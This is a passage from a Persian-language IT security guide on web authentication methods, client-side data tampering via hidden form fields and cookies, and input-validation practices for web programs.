‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺷﻤﺎ ﺍﺯ ﻃﺮﻳﻖ ﻣﺮﻭﺭﮔﺮ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ‪ IIS‬ﺩﺳﺘﺮﺳـﻲ‬
‫ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪ ،‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ‪ - ٢٢٥NTLM‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪ HTTP‬ﺑﺎ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﺘﺼﺎﺻﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ‪-‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻼﺻﺔ ‪ - ٢٢٦HTTP‬ﻛﻪ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﻣﻴـﺎﻥ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ‪ ،‬ﻳﻚ ‪ MD5 MAC‬ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ ‪ -‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Apache 2.0‬ﻭ ﻧﺴﺨﻪﻫـﺎﻱ‬
‫ﺟﺪﻳﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺧﻼﺻﻪﺳﺎﺯﻱ )‪ (Digest-based‬ﺑـﺎ ﻣـﺎﺟﻮﻝ ‪ mod_auth_digest‬ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﺨﺘﻠﻒ ﻧﻴـﺰ ﺭﻭ ﺑـﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‪ .‬ﻳـﻚ ﺍﺷـﻜﺎﻝ ﺍﻭﻟﻴـﺔ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫ﺧﻼﺻﻪﺳﺎﺯﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺭﻭﺵ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛـﻪ ﻳـﻚ ﻧـﺴﺨﺔ ﺭﻣﺰﻧـﺸﺪﻩ ﺍﺯ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﻫﺮﻳـﻚ ﺍﺯ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺧﻼﺻﻪﺳﺎﺯﻱ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ ﻣـﺴﺘﻨﺪﺍﺕ‬
‫‪ Apache‬ﺑﺪﻧﺒﺎﻝ ﻛﻠﻤﺔ ‪ AuthDigestFile‬ﺑﮕﺮﺩﻳﺪ ﻭ ﻳﺎ ﺑﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫‪http://www.apache.org/doc-2.0/mod/mod_auth_digest.html‬‬
‫‪ .٢١‬ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺍﺯ ﭼﻪ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ‪ ،‬ﻭ ﺍﮔـﺮ ﺑﺮﻧﺎﻣـﻪ ﻭﺭﻭﺩﻱ‬
‫ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ ﭼﻪ ﻋﻤﻠﻜﺮﺩﻱ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺍﮔﺮ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻴﺎﻥ ﺩﻭ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﺳﻴـﺴﺘﻤﻲ ﺍﻳﺠـﺎﺩ‬
‫ﺗﺄﺧﻴﺮ ﻧﻤﺎﻳﻴﺪ‪ ،‬ﺗﺄﺛﻴﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮ ﻋﻤﻠﻜﺮﺩ ﺑﺮﻧﺎﻣﻪ ﭼﻪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪.‬‬
‫ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﻴﺸﺘﺮ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻘﻴﻘﺖ ﺧﻄﺎﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﺯ ﻳﻚ ﻧﻈﺮ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺧﺒـﺮ ﺧـﻮﺑﻲ‬
‫ﺗﻠﻘﻲ ﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻫﺮﭼﻘﺪﺭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻳﻤﻦﺗﺮ ﻛﻨﻨﺪ‪ ،‬ﺩﺭ ﻭﺍﻗﻊ ﺁﻧﺮﺍ ﻣﻄﻤﺌﻨﺘﺮ ﻭ ﻗﺎﺑﻞﺍﺗﻜﺎﺗﺮ ﻛﺮﺩﻩﺍﻧﺪ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﺍﺯ ﻓﻴﻠﺪﻫﺎ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﻣﺨﻔﻲ‪ ،‬ﻭ ‪Cookie‬ﻫﺎ‬


‫ﻻ ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺏ ﺍﻳﻤﻦ ﺭﺍ ﺩﺷﻮﺍﺭ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻌﻤﺎﺭﻱ ﺑﺎﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺏ ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳـﻚ‬ ‫ﻳﻜﻲ ﺍﺯ ﺩﻻﻳﻠﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﻻ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻣﻲﻧﻮﻳﺴﻴﺪ ﻛﻪ ﺑﻪ ﺷﻜﻞ ﻣﺤﻠﻲ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﺍﺟﺮﺍ ﻣﻲﺷـﻮﺩ‪ ،‬ﻭ‬ ‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺗﺤﺖ ﻭﺏ ﺭﺍ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺑﺴﻴﺎﺭ ﻛﻮﭼﻜﺘﺮ ﻛﻪ ‪ download‬ﻣﻲﺷﻮﺩ ﻭ ﺭﻭﻱ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻛﺎﺭﺑﺮ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺯﻣﺎﻥ ﺯﻳـﺎﺩﻱ ﺭﺍ ﺻـﺮﻑ‬
‫ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻛﻨﻴﺪ ﻛﻪ ﺍﻳﻦ ﺩﻭ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺗﻌﺎﻣﻞ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﻳﻜـﺴﺎﻥ ﺑـﻮﺩﻥ ﻧـﺎﻡ‬
‫ﻓﻴﻠﺪﻫﺎﻱ ﺩﺭﻭﻥ ﻓﺮﻣﻬﺎﻱ ﻭﺏ ‪download‬ﺷﺪﻩ ﺑﺎ ﻧﺎﻡ ﻓﻴﻠﺪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻧﺘﻈﺎﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﻣﺪﺗﻲ ﺯﻣﺎﻥ ﻧﻴﺰ ﺻﺮﻑ ﺁﻥ ﻣـﻲﻛﻨﻴـﺪ ﻛـﻪ ﻣﻄﻤـﺌﻦ ﺷـﻮﻳﺪ ﻓﺮﻣﻬـﺎﻱ ‪ ،JavaScript ،HTML‬ﻭ ﺳـﺎﻳﺮ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ‪ download‬ﺷﺪﻩﺍﻧﺪ‪ ،‬ﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻼ ﻫﻤﺎﻫﻨﮓ ﺑﺎﺷﻨﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ .‬ﭼﻴﺰﻱ‬ ‫ﺣﺘﻲ ﺩﺭ ﺑﻬﺘﺮﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﻳﺎﻓﺘﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻭ ﻣﺮﻭﺭﮔﺮ ﺑﺎ ﻫﻢ ﻛﺎﻣ ﹰ‬
‫ﻛﻪ ﻛﻞ ﻓﺮﺁﻳﻨﺪ ﺭﺍ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﺩﭼﺎﺭ ﺍﺷﻜﺎﻝ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﻬﺎﺟﻤﺎﻥ‪ ،‬ﻃﺒﻖ ﺗﻌﺮﻳﻒ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﺑﺎﺯﻱ ﺭﺍ ﺭﻋﺎﻳﺖ ﻧﻤـﻲﻛﻨﻨـﺪ‪ .‬ﻣﻄﻤﺌﻨـﹰﺎ‬
‫ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﺮﻣﻬﺎﻱ ‪ HTML‬ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ JavaScript‬ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻣﻌﻤﻮﻟﻲ ﺑﺎﺯ ﻛﻨﻨـﺪ ﺗـﺎ ﻣـﺸﻜﻠﻲ ﭘـﻴﺶ ﻧﻴﺎﻳـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﻼ ﻣـﻮﺭﺩﻱ ﻭ‬ ‫ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﻧﺠﺎﻡ ﻧﺪﺍﺩﻥ ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺑﺎﻳﻨﺪ‪ ،‬ﺗﺤﻠﻴﻞ ﻛﻨﻨﺪ‪ ،‬ﻭ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺷـﻤﺎ ﭘﺎﺳـﺨﻬﺎﻱ ﻛـﺎﻣ ﹰ‬
‫ﻣﻐﺮﺿﺎﻧﻪ ﺑﻔﺮﺳﺘﻨﺪ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻼﺕ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻌﻤﻮﻟﻲ ﻭﺏ ﻛـﺎﺭ ﺳـﺎﺩﻩﺍﻱ ﻧﻴـﺴﺖ ﻛـﻪ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻨﺪ؛ ﻭ ﺩﺭ ﻫﺮﺣﺎﻝ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ ﺣﻤـﻼﺕ ﻣﻤﻜـﻦ‬
‫ﻋﻠﻴﻪ ﻳﻚ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ‪ CGI‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻮﺭﺩ ﺍﻋﺘﻤﺎﺩ ﻻﺯﻡ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺭﻧﺪ‪.‬‬
‫ﺫﺧﻴﺮﻩﻛﺮﺩﻥ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ‪ ،‬ﻣﻨﻊ ﺫﺍﺗﻲ ﻧﺪﺍﺭﺩ‪ ،‬ﺑﻠﻜﻪ ﺣﺘﻲ ﻧﻴﺎﺯ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﺭﺩﻳﺎﺑﻲ ﻛـﺎﺭﺑﺮ‪ ،‬ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺳﻤﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﻣﺮﺗﻔﻊ ﻣﻲﺳﺎﺯﺩ؛ ﺍﻣﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻣﺠﺒﻮﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﻫﺮﮔﺎﻩ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﺯ ﻛﺎﺭﺑﺮ‬
‫ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﭼﻴﺰﻱ ﺍﺯ ﺁﻥ ﻧﺎﺩﺭﺳﺖ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪.‬‬

‫‪225 NT Challenge/Response‬‬
‫‪226 HTTP Digest Authentication‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦٦‬‬

‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﻧﻴﺎﺯ ﺑﻪ ﺗﺄﻳﻴﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺯﮔﺸﺘﻲ ﺍﺯ ﺳﻮﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺩﺭﻙ ﻧﻤـﻲﻛﻨﻨـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﺩﺭ ﺩﺳﺎﻣﺒﺮ ‪ ۱۹۹۹‬ﻣﻬﻨﺪﺳﺎﻥ ﺩﺭ ‪ ٢٢٧ISS‬ﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛـﻪ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﻪ ﻣﺘﻌﻠـﻖ ﺑـﻪ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﺨﺘﻠﻒ ﺑﻮﺩﻧﺪ ﻫﻤﮕﻲ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺸﺘﺮﻙ ﺩﺍﺭﻧﺪ‪ :‬ﻫﻤﮕﻲ ﺁﻧﻬﺎ ﺍﺯ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﺮﺩﻧـﺪ ﻛـﻪ ﻗﻴﻤـﺖ‬
‫ﻣﻘﻄﻮﻉ ﻫﺮ ﻛﺎﻻ ﻧﻴﺰ ﺩﺭ ﺁﻥ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ‪ ،‬ﺍﻣﺎ ﻫﻤﺔ ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺑـﻮﺩ ﻭ ﻫـﻴﭻ ﺍﺭﺯﻳـﺎﺑﻲ ﺻـﺤﺘﻲ ﻧﻴـﺰ ﺭﻭﻱ ﺁﻧﻬـﺎ ﺍﻧﺠـﺎﻡ‬
‫ﻧﻤﻲﺷﺪ‪ ٢٢٨.‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺁﻣﺎﺩﻩ ﻣﻲﺷﺪ ﻭ ﻫﺰﻳﻨﺔ ﺁﻥ ﺍﺯ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻛﺎﺳـﺘﻪ ﻣـﻲﺷـﺪ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺮﺑﻮﻃـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻛﻮﺭﻛﻮﺭﺍﻧﻪ ﺑﻪ ﻗﻴﻤﺘﻬﺎﻱ ﺭﻭﻱ ﻛﺎﺭﺗﻬﺎﻱ ﺧﺮﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻣﻲﻛﺮﺩﻧﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻫﺮ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﻣﻲﺧﻮﺍﺳﺖ ﺑﻪ ﺧﻮﺩﺵ ﺩﺭ ﻗﻴﻤﺘﻬﺎ ﺗﺨﻔﻴﻒ‬
‫ﺑﺪﻫﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺴﺖ ﺑﺎ ﺍﺭﺳﺎﻝ ﻳﻚ ﺩﺭﺧﻮﺍﺳﺖ ﺧﺮﻳﺪ ﺍﻳﻨﺘﺮﻧﺘﻲ‪ ،‬ﻓﺮﻡ ‪ HTML‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺭﻭﻱ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨـﺪ‪،‬‬
‫ﻗﻴﻤﺘﻬﺎ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﺎﻳﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺩﻛﻤﺔ "ﺧﺮﻳﺪ" ﺭﺍ ﺑﻔﺸﺎﺭﺩ‪.‬‬
‫ﺩﺭ ﻣﻄﺎﻟﻌﻪﺍﻱ ﻛﻪ ﺩﺭ ﺑﻬﺎﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺍﻧﺠﺎﻡ ﺷﺪ‪ ٢٢٩،‬ﭼﻬﺎﺭ ﺗﻦ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻼﻥ ‪ MIT‬ﻣﺘﻮﺟﻪ ﺷﺪﻧﺪ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺗﺠـﺎﺭﺕ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ‪cookie‬ﻫﺎ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﻧﻤﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﺴﺘﻨﺪ ﺗﻐﻴﻴﺮﺍﺕ ﻫﻮﺷﻤﻨﺪﺍﻧﻪﺍﻱ‬
‫ﺩﺭ ‪cookie‬ﻫﺎﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺪﻫﻨﺪ ﺗﺎ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﻨﺪ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﻳﻤﻦ ﺍﺯ ﻓﻴﻠﺪﻫﺎ‬


‫ﻫﻨﮕﺎﻡ ﺑﺮﺭﺳﻲ ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﻭﺭﻭﺩﻱ ﺑﻪ ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺑﻪ ﻧﻜﺎﺕ ﺯﻳﺮ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﻧﻤﺎﻳﻴﺪ‪:‬‬
‫ﻼ ﺍﮔـﺮ ﻳـﻚ ﻓﻴﻠـﺪ‬ ‫ﻣﺤﺘﻮﻳﺎﺕ ﻫﺮ ﻓﻴﻠﺪ ﺭﺍ ﻏﺮﺑﺎﻝ ﻛﻨﻴﺪ ﻭ ﺗﻨﻬﺎ ﺑﻪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻭﺭﻭﺩ ﺑﺪﻫﻴﺪ ﻛﻪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺁﻥ ﻓﻴﻠﺪ ﻫﺴﺘﻨﺪ‪ .‬ﻣـﺜ ﹰ‬ ‫•‬
‫ﻗﺮﺍﺭ ﺍﺳﺖ ﻳﻚ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﺷﺪ‪ ،‬ﺑﻪ ﺍﺭﻗﺎﻡ ﻣﻴﺎﻥ ﺻﻔﺮ ﺗﺎ ‪ ۹‬ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻴﺪ ﻭ ﻣـﺎﺑﻘﻲ ﺍﺭﻗـﺎﻡ ﺭﺍ ﻧﺎﺩﻳـﺪﻩ ﺑﮕﻴﺮﻳـﺪ‪ .‬ﺍﻧﺠـﺎﻡ‬
‫ﺍﻳﻨﻜﺎﺭ ﻋﻼﻭﻩ ﺑﺮ ﻣﺰﺍﻳﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﻓﺎﺻﻠﻪ ﻭ ﻳﺎ ﺧﻂﻓﺎﺻـﻠﻪ ﻭﺍﺭﺩ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺑﻌﺪ ﺍﺯ ﺁﻧﻜﻪ ﻭﺭﻭﺩﻳﻬﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻳﺪ‪ ،‬ﻃﻮﻝ ﻫﺮ ﺁﺭﮔﻮﻣﺎﻥ ﺭﺍ ﻧﻴﺰ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻃﻮﻝ ﺁﻥ ﻧﺎﺩﺭﺳﺖ ﺑﻮﺩ‪ ،‬ﺁﻧـﺮﺍ ﺗﺄﻳﻴـﺪ‬ ‫•‬
‫ﻧﻜﻨﻴﺪ؛ ﻭ ﺑﺠﺎﻱ ﺁﻥ ﻳﻚ ﭘﻴﻐﺎﻡ ﺧﻄﺎ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭﺁﻭﺭﻳﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﻧﺘﺨﺎﺑﻲ‪ ٢٣٠‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﺁﻧﭽـﻪ ﻛـﺎﺭﺑﺮ ﺑﻌﻨـﻮﺍﻥ ﺍﻧﺘﺨـﺎﺏ ﺧـﻮﺩ ﺍﺭﺍﺋـﻪ ﻛـﺮﺩﻩ‪ ،‬ﻳﻜـﻲ ﺍﺯ‬ ‫•‬
